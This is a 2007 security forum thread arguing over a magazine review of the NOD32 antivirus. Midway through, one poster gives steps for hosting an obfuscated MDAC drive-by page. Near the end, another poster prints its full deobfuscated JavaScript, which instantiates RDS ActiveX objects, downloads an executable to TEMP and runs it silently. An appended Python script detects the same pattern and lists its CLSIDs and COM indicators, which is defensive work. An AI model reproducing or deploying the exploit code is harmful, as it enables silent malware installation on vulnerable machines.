UK's PC Pro Review

Discussion in 'NOD32 version 2 Forum' started by nonmirecordo, Jul 12, 2007.

Thread Status:
Not open for further replies.
  1. webyourbusiness

    webyourbusiness Registered Member

    Joined:
    Nov 16, 2004
    Posts:
    2,662
    Location:
    Throughout the USA and Canada
    the whole point of big large buttons - like "Protection ON" and "Secured" are to keep the masses who have no idea about the internal workings of a complex software system like an antivirus from thinking... they don't WANT to know the ins and outs of how they are protected (for the vast majority) - that's a reality. You and I are NOT in the majority in wanting finite control over our own protection system. You and I are "power users" - and those kinds of dumbed down interfaces are what the majority of the world wants/needs to NOT be overwhelmed by the thought process of trying to understand what an antithreat solution must actually accomplish.

    Pure and simple... simple interfaces are what the unwashed masses want... ESS's new interface goes a LONG way to help there.
     
  2. webyourbusiness

    webyourbusiness Registered Member

    Joined:
    Nov 16, 2004
    Posts:
    2,662
    Location:
    Throughout the USA and Canada
    Come on... you know how the world at large works... publishing is no different...

    it's not what you know in general that gets you into a position of trust and "power" - it's WHO you know... he probably went to Cambridge with someone higher up in the magazine's hierarchy - that's all the qualification it takes to become an "expert" in the eyes of your compadres... it's not a question of being a "real" expert! ;)
     
  3. Zombini

    Zombini Registered Member

    Joined:
    Jul 11, 2006
    Posts:
    469
    Actually NOD32 is not very good at generically detecting drive-by downloads that have been obfuscated by JavaScript. I say generically, because one can easily and constantly write string-based signatures for each version of obfuscation out there. But if a new one comes out, the signature is useless. Kaspersky has some level of JScript interpreter so it can deobfuscate some obfuscation algorithms, but as soon as you use math functions in the obfuscation Kaspersky is screwed. Is NOD32 even that good? I don't know. NIS2008 Beta is the only product I have tested so far that can generically detect drive-by downloads no matter what kind of obfuscation is used.

    So overall, at least in this area, NOD is falling behind.
     
  4. lucas1985

    lucas1985 Retired Moderator

    Joined:
    Nov 9, 2006
    Posts:
    4,047
    Location:
    France, May 1968
    All AVs should start to include a JavaScript interpreter.
     
  5. webyourbusiness

    webyourbusiness Registered Member

    Joined:
    Nov 16, 2004
    Posts:
    2,662
    Location:
    Throughout the USA and Canada
    if the AMON module finds the threat, why try and keep up with an ever moving target of obfuscating downloader code?

    As I understand it, IMON is going to be axed - so as long as AMON grabs the malware, I don't care if it actually gets onto my machine - I ONLY care that it is grabbed before it can execute and do any harm.
     
  6. The_Duality

    The_Duality Registered Member

    Joined:
    Apr 3, 2007
    Posts:
    276
    Location:
    Liverpool, UK
    And replaced with a new HTTP scanner.
     
  7. Zombini

    Zombini Registered Member

    Joined:
    Jul 11, 2006
    Posts:
    469
    That is not going to work just because of the scope of the APIs that would have to be implemented. Security vendors could spend years implementing such an interpreter and during that time the bad guys will continue to find JScript APIs that are not interpreted and will bypass the protection.


    I have attached a file that contains obfuscated HTML for the MDAC attack. Rename it to an html and host it on a web server. Copy a file called downloader.exe into the same directory as the html on the webserver. Browse to this web page using an unpatched XP SP2 machine running ESS or NOD32 2.7. The downloader.exe will run, proving that NOD has zero protection against drive-by downloads.

    Btw.. the obfuscated HTML was created using a tool I created. It will create a completely random unique HTML every time I run it. No, I will not release the tool for obvious reasons. NOD 2.7 and ESS are completely useless at detecting this, so is Kaspersky 7. NIS 2008 Beta can, but the older versions can't. Strange.
     

  8. Zombini

    Zombini Registered Member

    Joined:
    Jul 11, 2006
    Posts:
    469
    :) AMON does not detect the malware, because the malware is constantly changing, just like the obfuscated JScript. There are many examples of live websites today that generate a new malware executable every time you visit that URL and these executables are not detected by NOD.

    Remember that there are 4 pieces here: the vulnerability (which doesn't change), the JScript that implements the vulnerability (this is constantly being obfuscated and changed), the downloader.exe (constantly changing) and the malware that the downloader downloads (again constantly changing). The only way to provide proactive protection is to generically detect the vulnerability. All other methods are reactive.
     
  9. Zombini

    Zombini Registered Member

    Joined:
    Jul 11, 2006
    Posts:
    469
    Why are they changing the HTTP Scanner ?
     
  10. The_Duality

    The_Duality Registered Member

    Joined:
    Apr 3, 2007
    Posts:
    276
    Location:
    Liverpool, UK
    I actually have no idea :p

    I'm not sure how the new scanner will work... although I think I read somewhere that the winsock level scanner will be replaced with an NDIS filter... I'm not sure so don't quote me on it. ;)
     
  11. webyourbusiness

    webyourbusiness Registered Member

    Joined:
    Nov 16, 2004
    Posts:
    2,662
    Location:
    Throughout the USA and Canada
    get used to it - Antivirus is reactive because of the porous operating system you CHOOSE to use.
     
  12. Zombini

    Zombini Registered Member

    Joined:
    Jul 11, 2006
    Posts:
    469
    No actually I don't get used to it - I just switch over to products that have better proactive protection. For example, today 15th July 2007, here is a website which if you visit it, the machine will be infected with a completely updated NOD 2.7 or ESS. [url removed - no links to active malware allowed - Blue]


    Btw.. which OS do you use ?
     
    Last edited by a moderator: Jul 16, 2007
  13. ASpace

    ASpace Guest

    Because of its current nature. IMON works at the Winsock level. Unfortunately too many programs touch there and could possibly damage the Winsock and stop the network connection. IMON requires a "clean" :D Winsock to work well :thumb:
     
  14. webyourbusiness

    webyourbusiness Registered Member

    Joined:
    Nov 16, 2004
    Posts:
    2,662
    Location:
    Throughout the USA and Canada
    My operating systems of choice are not always MY choice, but chosen instead because of applications I either MUST, or would prefer to have an option to run... so a run-down of my computers, current and past begins...

    At the moment...

    in the office I run windows xp pro on all my machines except a test server running CentOS, at home I have a windows gaming machine with XP Pro. I also have an intel macbook with dualboot, MacOS 10 Tiger and Win XP pro partition with NOD32 on it (for work related issues I have to vpn/remote desktop to work and MacOS won't do that with our current vpn).... for working servers, I run a cluster of a dozen various unix flavors (I have 20+ years unix admin experience) - some Trustix, some CentOS and the new mailservers I'm currently speccing to build will be BSD flavored - Dual QuadCore beasts. I use whatever operating system best fits the job with the knowledge at hand... and I adapt... like I'll be upgrading the vpn at the office so that I don't HAVE to use windows XP to vpn in!

    Previous incarnations of personal machine have ranged from xp, win2k, redhat, win 98, win 95, win 3.1, macos 7 + 8, and a whole hosts of machines I learned on prior to work such as Amstrads (both a PCW and CPC) Commodores Amiga and C64 before that and even a Sinclair Spectrum 48k...

    I am, if nothing, aware of my choices - and take appropriate hardening actions for said machines...
     
  15. The_Duality

    The_Duality Registered Member

    Joined:
    Apr 3, 2007
    Posts:
    276
    Location:
    Liverpool, UK
    Hehe, I feel like such a "n00b" :rolleyes::p
     
  16. mykemyk

    mykemyk Registered Member

    Joined:
    Jul 17, 2007
    Posts:
    6
    How come there are so many fanboys of NOD32? It's just an AV product. Why get angry about people not liking the product?
     
  17. luciddream

    luciddream Registered Member

    Joined:
    Mar 22, 2007
    Posts:
    2,545
    Couldn't agree more. I too like the interface of KAV & Nod32, maybe I'm just oldschool? Everything is where I want it to be. People that can't figure it out probably don't belong anywhere near a computer in the first place, it really is not rocket science.

    Most people's idea of a good interface nowadays is for it to say "You Are Protected" in big green letters, giving one a false sense of security. That kind of stuff doesn't impress me. I don't care how pretty it looks... just shut up and do your job and we'll get along just fine.

    Also I've been a very satisfied Nod32 v2.7 user for months now, and combined with common sense and safe browsing habits nothing has penetrated it. Once in a while I go to other sites to do scans to see if it missed anything. It never does. I just can't fathom that the next AV is any better detection wise, but the tests show otherwise.

    I have no plans to switch anytime soon, regardless of articles such as this.
     
  18. TJP

    TJP Registered Member

    Joined:
    May 6, 2006
    Posts:
    120
    Hi mykemyk,

    This is the official Nod32 support forum; some of the posters will take a poor review personally... just like posters on other official AV forums do when a less than stellar review is published about "their" AV :p

    If you want to see the real "fanboys" go at it, please read some test results threads in the other AV software forum...that's when they all come out of the woodwork :D...

    Cheers.


     
  19. trjam

    trjam Registered Member

    Joined:
    Aug 18, 2006
    Posts:
    9,102
    Location:
    North Carolina USA
    you got that right cus.:rolleyes:
     
  20. NOD32 user

    NOD32 user Registered Member

    Joined:
    Jan 23, 2005
    Posts:
    1,766
    Location:
    Australia
    I'm not really sure that they were using NOD32 when they discovered this new profile feature....
    I realise that the on-demand scanner has this feature but I'm not sure how that relates to real time operations...
    The writer has achieved his purposes I think - he has filled his word quota, related his experience and perception, and the results of his testing and at the same time has created discussion of his article, driven traffic to the web site and probably sold more magazines.

    Whether or not this person was qualified to do any of these things I do not know but it does not matter - If four people were reviewing oranges and one likes oranges, one really really likes oranges, one dislikes oranges and one really really dislikes oranges, what sort of reports do you think that they would write?

    Cheers :)
     
  21. berng

    berng Registered Member

    Joined:
    Sep 11, 2005
    Posts:
    252
    Location:
    NJ, USA
    We've been waiting for version 3 now for a year. It's a shame that Eset is taking so long to finish it.

    I don't like the current interface with all these modules either and I suspect neither does Eset, a major reason version 3 is coming out. So the reviewer's criticism is valid.

    My licenses will run out in three weeks. Since version 3 is not ready, I'll be trying out Kaspersky, F-Secure and last, if out of beta, NOD version 3 before I pay for new subscriptions.
     
  22. Ngwana

    Ngwana Registered Member

    Joined:
    Jul 5, 2006
    Posts:
    156
    Location:
    Glasgow, United Kingdom
    True, it is a product but there is also another side here:

    AV-testing has been under the spotlight for a while; the methods and ranked results are becoming nothing but a mockery. In some cases the lowest ranked product by some 'independent' AV tester will outperform every other product in the same week of testing by another tester. Add insult to that by enduring the boasts of some AV-gurus who always post on forums how they poke holes in the AV products.

    I am not offended by reviewers not liking a particular product (including NOD 32) but perhaps some users have come to take things too personally and worship products. Security is much more complex than the performance of products. We all know the weakest link in security is the USER. I hope that no AV vendor will feel financial pressure and get tempted to over-hype the effectiveness of his/her product by misleading adverts or reviews/awards. :cool:
     
  23. ASpace

    ASpace Guest

    Well, with all my best regards, this is not true. Let me explain why.
    First, ESET is an excellent but small company. Keep in mind that they are a good but small team - they don't have the same resources and manpower as Microsoft/Symantec/McAfee... but they are still top. Because of this they act slowly and carefully, and even though it is a slow step up, it is a good step up.

    ESET are a small team but they respond to all users' wants - they make new Linux products, they make the Online Scanner, they do support NOD32 v2, they create a new Suite, they made a Mobile AV...

    You can't compare the manpower of ESET to that of Microsoft or to that of Symantec, but still ESET are a top player when it comes to quality.

    When talking about quality, I am not sure if any of you have noticed, but ESET are a company with real quality control. ESET will never push software which is ~unstable~ and which can make a real computer-quake (earthquake), which can bring any machine to complete data loss and a complete no-boot. Not so many resources, but they act slowly and with quality. I am sure we can all name some vendors which play games, every new year = new suite (2005 - new suite, 2006 - new suite, 2007 - new suite, 2H of 2007 - new suite = 2008, I am sure they'll have a new product 2009 ready in March 2008). These vendors have no quality control no matter what some may tell you. We have all seen it, and those products are not stable and really working until their first or second big update. They publish "new stuff" earlier because these vendors have nothing else to offer, and thus the new version is a combo of the Marketing dept. and the Development dept. to make users pay some attention to them.

    Even though we see the development of the new ESET products, we still have the old ones which are not worse (I mean the new ones are much better but the old ones still work effectively). Although I am not inside ESET, I am 100% sure they will not push new products to the mass public unless they are completely ready.

    Regards! :thumb:
     
  24. trjam

    trjam Registered Member

    Joined:
    Aug 18, 2006
    Posts:
    9,102
    Location:
    North Carolina USA
    I am going to have to differ with you on that one. There is an old saying that you can put your profits in your pocket, or back into your company. Eset has done very well and they have earned it. But the small company reference you make doesn't hold water with me. Avira is a company of around 250 folks and they do seem to get it right. It is all in where you lay your priorities as a company.
     
  25. NOD32 user

    NOD32 user Registered Member

    Joined:
    Jan 23, 2005
    Posts:
    1,766
    Location:
    Australia
    It may be obfuscated but it's not hard to decipher:
    Code:
    function CreateO(o, n) {
        var r = null;

        try { eval('r = o.CreateObject(n)') } catch(e) {}

        if (!r) {
            try { eval('r = o.CreateObject(n, "")') } catch(e) {}
        }

        if (!r) {
            try { eval('r = o.CreateObject(n, "", "")') } catch(e) {}
        }

        if (!r) {
            try { eval('r = o.GetObject("", n)') } catch(e) {}
        }

        if (!r) {
            try { eval('r = o.GetObject(n, "")') } catch(e) {}
        }

        if (!r) {
            try { eval('r = o.GetObject(n)') } catch(e) {}
        }

        return(r);
    }


    function Go(a) {
        var s = CreateO(a, "WScript.Shell");
        var o = CreateO(a, "ADODB.Stream");
        var e = s.Environment("Process");

        // form the path to the actual downloader.exe

        var url = document.location.toString ();
        var num = url.lastIndexOf ("/");    // find the last slash
        url = url.substring (0, num);
        url = url + "/downloader.exe";

        var xml = null;
        var bin = e.Item("TEMP") + "downloader.exe";
        var dat;

        try { xml = new XMLHttpRequest(); }
        catch(e) {
            try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
            catch(e) {
                xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
            }
        }

        if (!xml) return(0);

        xml.open("GET", url, false);
        xml.send(null);
        dat = xml.responseBody;

        o.Type = 1;
        o.Mode = 3;
        o.Open();
        o.Write(dat);
        o.SaveToFile(bin, 2);

        s.Run(bin, 0);
    }

    function Exploit() {
        var i = 0;
        //                    RDS Data control                        RDS Data Control             Business object factory
        var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}', /*'{BD96C556-65A3-11D0-983A-00C04FC29E36}',*/ '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null);

        while (t[i]) {
            var a = null;

            if (t[i].substring(0,1) == '{') {
                a = document.createElement("object");
                a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
            } else {
                try { a = new ActiveXObject(t[i]); } catch(e) {}
            }

            if (a) {
                try {
                    var b = CreateO(a, "WScript.Shell");
                    if (b) {
                        Go(a);
                        return(0);
                    }
                } catch(e) {}
            }
            i++;
        }

    }

    Exploit();
    And usually it's a tip off when there are more than three prompts for activeX etc...
    [Three attached screenshots (13_08_2007): the ActiveX prompts]
    Hardly what I'd call a drive-by download when it requires user permission...

    Cheers :)

    edit: Sorry, you said 'unpatched' SP2 didn't you...
    What does this have to do with UK's PC Pro Review anyway? I must have missed something...
     
    Last edited: Aug 12, 2007
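As an added example (not code from the thread or from any of the products discussed), the Python script below does the static triage a defender would want for a saved page like the one deobfuscated above: it looks for the CLSIDs and the ADODB.Stream / WScript.Shell / SaveToFile / Run chain visible in that listing, and, because the thread's point is that string signatures break once the script is obfuscated, it also flags the generic decoder-plus-encoded-literal pattern so such pages are at least routed to emulation or a sandbox. The three sample pages are constructed inline; the CLSID list is taken from the listing, nothing else is assumed.

```python
"""Static triage of saved HTML/JS for the MDAC drive-by pattern shown above (added example)."""
import re

# CLSIDs copied from the deobfuscated listing in the thread, upper-cased for comparison.
MDAC_CLSIDS = {
    "BD96C556-65A3-11D0-983A-00C04FC29E36",  # RDS Data control, the MDAC object the listing targets
    "AB9BCEDD-EC7E-47E1-9322-D4A210617116",
    "0006F033-0000-0000-C000-000000000046",
    "0006F03A-0000-0000-C000-000000000046",
    "6E32070A-766D-4EE6-879C-DC1FA91D2FC3",
    "6414512B-B978-451D-A0D8-FCFDF33E833C",
    "7F5B7F63-F06F-4331-8A26-339E03C0AE3D",
    "06723E09-F4C2-43C8-8358-09FCD1DB0766",
    "639F725F-1B2D-4831-A9FD-874847682010",
    "BA018599-1DB3-44F9-83B4-461454C84BF8",
    "D0C07D56-7C69-43F1-B4A0-25F5A11FAB19",
    "E8CCCDDF-CA28-496B-B050-6C07C962476B",
}

# Any GUID-shaped token, with or without braces or a "clsid:" prefix.
CLSID_RE = re.compile(r"[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}")

# The fetch-write-execute chain from the listing: COM object creation,
# HTTP fetch, binary stream written to disk, shell Run. Matched case-insensitively.
COM_INDICATORS = (
    "ADODB.Stream", "WScript.Shell", "Microsoft.XMLHTTP", "MSXML2.ServerXMLHTTP",
    "responseBody", "SaveToFile", "CreateObject(", "GetObject(", ".Run(",
)

# Generic obfuscation signals: a decoder call plus a long encoded literal.
DECODER_RE = re.compile(r"\b(eval|unescape|String\.fromCharCode|document\.write)\s*\(")
ENCODED_RE = re.compile(
    r"(?:%[0-9A-Fa-f]{2}){20,}"        # %41%42... URL-encoded run
    r"|(?:\\x[0-9A-Fa-f]{2}){20,}"     # \x41\x42... hex-escaped run
    r"|(?:\\u[0-9A-Fa-f]{4}){10,}"     # \u0041... unicode-escaped run
    r"|(?:\d{1,3}\s*,\s*){40,}"        # 65,66,67,... char-code arrays
)


def triage(page: str) -> dict:
    """Return the indicators found in `page` and a coarse verdict."""
    lowered = page.lower()
    clsids = sorted({m.upper() for m in CLSID_RE.findall(page)} & MDAC_CLSIDS)
    com = [s for s in COM_INDICATORS if s.lower() in lowered]
    decoders = sorted(set(DECODER_RE.findall(page)))
    encoded_blobs = len(ENCODED_RE.findall(page))

    if clsids:
        verdict = "mdac_exploit_pattern"      # known-bad CLSID instantiated in the clear
    elif len(com) >= 3:
        verdict = "suspicious_com_chain"      # fetch + write + run without a known CLSID
    elif decoders and encoded_blobs:
        verdict = "obfuscated_script"         # strings hidden; needs emulation or a sandbox
    else:
        verdict = "clean"
    return {"clsids": clsids, "com": com, "decoders": decoders,
            "encoded_blobs": encoded_blobs, "verdict": verdict}


# Constructed samples (not the attachment from the thread): a cleartext page with
# the listing's shape, a decoder-wrapped page, and a benign page.
CLEAR_SAMPLE = """<html><script>
var a = document.createElement("object");
a.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var s = CreateO(a, "WScript.Shell");
var o = CreateO(a, "ADODB.Stream");
var xml = new ActiveXObject("Microsoft.XMLHTTP");
o.SaveToFile(bin, 2); s.Run(bin, 0);
</script></html>"""
OBFUSCATED_SAMPLE = '<script>document.write(unescape("' + "%41" * 30 + '"));</script>'
BENIGN_SAMPLE = '<html><script>var x = document.getElementById("a"); x.innerHTML = "hi";</script></html>'

if __name__ == "__main__":
    for name, sample in (("clear", CLEAR_SAMPLE), ("obfuscated", OBFUSCATED_SAMPLE),
                         ("benign", BENIGN_SAMPLE)):
        print(name, triage(sample))
```

The obfuscated verdict is deliberately only a routing decision: as the thread notes, a string matcher cannot see through a fresh encoder, so those pages need a script emulator or a sandboxed browser to get a real answer.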